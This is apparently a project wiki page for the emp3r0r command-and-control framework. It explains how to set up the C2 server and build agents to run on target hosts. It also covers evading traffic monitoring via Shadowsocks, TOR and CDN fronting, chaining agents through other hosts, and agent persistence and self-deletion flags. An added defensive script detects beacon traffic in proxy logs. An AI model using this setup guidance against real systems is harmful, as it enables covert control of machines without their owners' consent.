Jimmy Mi edited this page Jun 11, 2024 · 36 revisions

CC (Command and Control)

This program includes a terminal UI that lets you navigate emp3r0r's features and control your targets (agents).

Currently, emp3r0r supports:

  • Direct agent to CC connection using HTTP2 via TLS
  • Connection through Shadowsocks with optional KCP (convert TCP to UDP) support
  • Connection through CDN using Websocket, no external program needed
  • Connection through TOR via external TOR proxy
  • Connection through upstream proxy server (HTTP, SOCKS, etc.)

Supported platforms: All CPU architectures that Go supports on Linux, and 386 / amd64 on Windows.

Configure C2 server and start C2 UI

Download the latest release from https://github.com/jm33-m0/emp3r0r/releases; the file to download is emp3r0r-vX.X.X.tar.xz.

Extract all files and run ./emp3r0r --install to install emp3r0r on your system. By default it installs to /usr/local/lib/emp3r0r and copies the launcher ./emp3r0r itself to /usr/local/bin, i.e. the PREFIX variable defaults to /usr/local.

If you wish to install emp3r0r to a different location, run PREFIX=/usr ./emp3r0r --install, substituting /usr with the directory you want to use. Typically, when installing software managed by the user rather than the package manager, you should use /usr/local, which makes it easier to maintain. If you install emp3r0r from a deb package or something similar, it installs to /usr.

After a successful installation, you should be able to execute emp3r0r from your current shell; the C2 UI will show if you have tmux installed.

On the first run, the emp3r0r launcher script generates the CA and C2 server certificates. You will be asked for the desired C2 server names, which agents use for server identification. If you plan to use your C2 server under more than one IP or domain, enter them space-separated, like example.com 192.168.0.1 TOROnionSiteName.onion

If you intend to make the server certificate valid for multiple domains/IPs (for example, a TOR domain and a normal domain), you can do that by adding multiple C2 addresses when prompted.

Direct connection (HTTP2 via TLS)

There's nothing to configure: once the C2 is started, type gen_agent to generate an agent binary and follow the on-screen instructions.

Shadowsocks (Obfuscated TCP)

Shadowsocks is well known to users living behind heavily censored Internet connections (China, Iran, etc.). It essentially erases everything that could be used as an identifier of its traffic; in other words, it tries to defeat DPI. When you enable Shadowsocks in your emp3r0r agent, the C2 traffic appears as encrypted TCP traffic that looks completely random and is hard to single out by traffic monitoring systems.

KCP

KCP exists to optimize your connection quality, as its homepage puts it:

Millions of devices(from low-end MIPS routers to high-end servers) have deployed kcp-go powered program in a variety of forms like online games, live broadcasting, file synchronization and network acceleration.

Seems quite useful for C2s as well, doesn't it?

KCP converts C2 traffic to UDP and encrypts/obfuscates it just like Shadowsocks does. When UDP is not restricted in your target network, KCP can dramatically improve the C2 connection quality and, as a bonus, is stateless (a key feature of UDP).

KCP can be optionally enabled when you enable Shadowsocks.

emp3r0r will generate randomized Shadowsocks configs for you automatically.

TOR

To use TOR, you have to set up a hidden service first.

Note: a TOR hidden service doesn't need a public IP address to work; you can run your service from anywhere.

Assuming your hidden service is configured as:

# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
# assuming 8000 is C2 port
# do NOT change 443 to other port numbers
HiddenServicePort 443 127.0.0.1:8000

TOR domain name:

❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onion

When generating C2 server certificate, make sure you include the onion address.

To generate an agent that uses the onion address as C2, type gen_agent and set C2 address accordingly.

CDN

First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.

I assume you already know how to configure a CDN for your website. Here we put our CC server behind Nginx:

       HTTP2           websocket in TLS        websocket          websocket                       HTTP2
agent -------> socks5 ------------------> CDN -----------> Nginx ----------> CC websocket server -------> CC

Nginx config:

# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
    proxy_pass http://127.0.0.1:9000/ws;
    proxy_redirect off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;

    # Show realip
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

Likewise, make sure the C2 address is set when generating certificates and when using gen_agent.

To run CC server with CDN support enabled:

emp3r0r -cdn2proxy 9000 # 9000 is the listening port of websocket server

Agent (runs on your targets)

Generate agents

Generate an agent binary for a target

In emp3r0r's console, type use gen_agent to build agent binaries and follow the on-screen instructions:

  • Configure the options to meet your needs using set <opt> <value> command.
  • Typically you need to set cc_host to the desired value, for example set cc_host my_cc.com; the port is not needed since it is randomly generated (it can be adjusted via emp3r0r.json).
  • When you are done configuring, type run to generate the agent binary.

Run the generated agent binary (under ~/.emp3r0r) on target host.

Upgrade agent on a target

When the target is connected, type upgrade_agent; the target will reconnect with the new version.

Configurable options

CC Indicator

This is a URL that works like Windows' NCSI connectivity check; it is designed to hide the actual C2 traffic.

You can configure this URL to some legit site such as https://github.com/jm33-m0/emp3r0r, or some other sites that are considered legit in your target network.

When this option is enabled, agents request the pre-configured URL and expect to find a certain text pattern in the server's response. If the pattern is found, agents go on to connect to the actual C2 server; if not, they sleep for a pre-configured time span and repeat the process.
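From the defender's side, the indicator loop just described is itself a pattern worth looking for: a host that fetches the same URL at a fixed interval, whatever the URL is. The script below is an added example written for this page, not emp3r0r code; it runs a generic beacon-interval heuristic over a constructed proxy log (the five-field line format and the function names are assumptions for the example, not anything the project defines) and flags client/URL series whose inter-request gaps are nearly constant.

```python
"""Beacon-interval heuristic over web proxy logs (added example, not emp3r0r code).

The log format below is constructed for this example: one line per request,
"<ISO-8601 timestamp> <client-ip> <method> <url> <status>".
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 fetches the same URL every 300 s (beacon-like),
# 10.0.0.7 visits the same URL at irregular, human-like intervals.
SAMPLE_LOG = """\
2024-06-11T10:00:00 10.0.0.5 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:00:04 10.0.0.7 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:05:00 10.0.0.5 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:01:37 10.0.0.7 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:10:00 10.0.0.5 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:15:00 10.0.0.5 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:33:12 10.0.0.7 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T10:20:00 10.0.0.5 GET https://github.com/jm33-m0/emp3r0r 200
2024-06-11T11:02:45 10.0.0.7 GET https://github.com/jm33-m0/emp3r0r 200
"""


def parse_log(text):
    """Yield (timestamp, client, url) tuples; lines that don't fit the format are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, _method, url, _status = parts
        try:
            yield datetime.fromisoformat(ts), client, url
        except ValueError:
            continue


def find_beacons(text, min_requests=4, max_cv=0.1):
    """Return {(client, url): mean_interval_seconds} for request series whose
    inter-request intervals are nearly constant.

    max_cv is the allowed coefficient of variation (stdev / mean) of the gaps:
    a fixed sleep gives a value near 0, human browsing a much larger one.
    """
    series = defaultdict(list)
    for ts, client, url in parse_log(text):
        series[(client, url)].append(ts)

    hits = {}
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits[key] = avg
    return hits


if __name__ == "__main__":
    for (client, url), interval in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {url}: every {interval:.0f}s")
```

On the sample above only 10.0.0.5 is reported (every 300 s); the irregular visits from 10.0.0.7 fall well outside max_cv. The heuristic assumes a fixed sleep interval, which is what the page describes; a randomized sleep spreads the gaps, so a wider tolerance and a longer observation window are needed, and the reported hosts should always be correlated with the follow-on connection to the real C2 address rather than blocked on the indicator URL alone, since that URL is a legitimate site by design.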

C2 transport proxy

You can specify (hardcode) a proxy address in your agent binary when using gen_agent; this proxy is used by the HTTP2 C2 connection.

Auto proxy

Agents use UDP broadcasts to find each other and form a proxy chain to gain Internet access (so they can connect back to C2).

This can be disabled if you don't want the agent to send noisy UDP traffic (you can also adjust the time interval via broadcast_interval_min and broadcast_interval_max).

Bring agents to C2

This is not a build-time option, but since I have mentioned auto-proxy, I will explain this as well.

This works like ssh -R: one connected agent initiates a connection towards another agent (one that cannot send outbound traffic) and uses that connection to provide a SOCKS5 proxy for the target agent so it can reach C2.

emp3r0r @local (run_proxy) > use bring2cc
2023/04/21 10:47:04 Using module "bring2cc"
Bring a target host to CC by connecting to it first (target host must have agent installed)

+--------+----------------------+----------+
| OPTION |         HELP         |  VALUE   |
+--------+----------------------+----------+
| module | Selected module      | bring2cc |
+--------+----------------------+----------+
| target | Selected target      | <blank>  |
+--------+----------------------+----------+
| addr   | Target host to proxy | <blank>  |
|        | , we will connect to |          |
|        |  it and proxy it out |          |
+--------+----------------------+----------+

DoH server

Use DNS over HTTPS in the agent to secure its DNS requests; you can opt out if this is not a concern or DoH is unavailable.

Direct connection

To run an agent with a direct connection to the CC server, just run ./agent; if you want more control, configure the options in gen_agent.

TOR

Likewise, build the agent with onion domain name as CC host.

To run the agent, you have to run a TOR proxy first; I have a static tor binary for you.

On your target, run ./agent; it will automatically use the TOR proxy (socks5://127.0.0.1:9050).

Or, if you want to use a different TOR proxy, set a C2 transport proxy when using gen_agent.

CDN

Same build process; use your domain name as the CC IP.

Set CDN proxy to something like wss://example.com/emp3r0r when using gen_agent.

Command line options and environment variables

  • VERBOSE=true to enable logging for agent
  • PERSISTENT=true to prevent self-deleting
  • ELVSH=TRUE to run agent binary as interactive elvsh shell
  • REPLACE_AGENT=true or -replace to replace existing agent process (if applicable)
  • -version to view agent version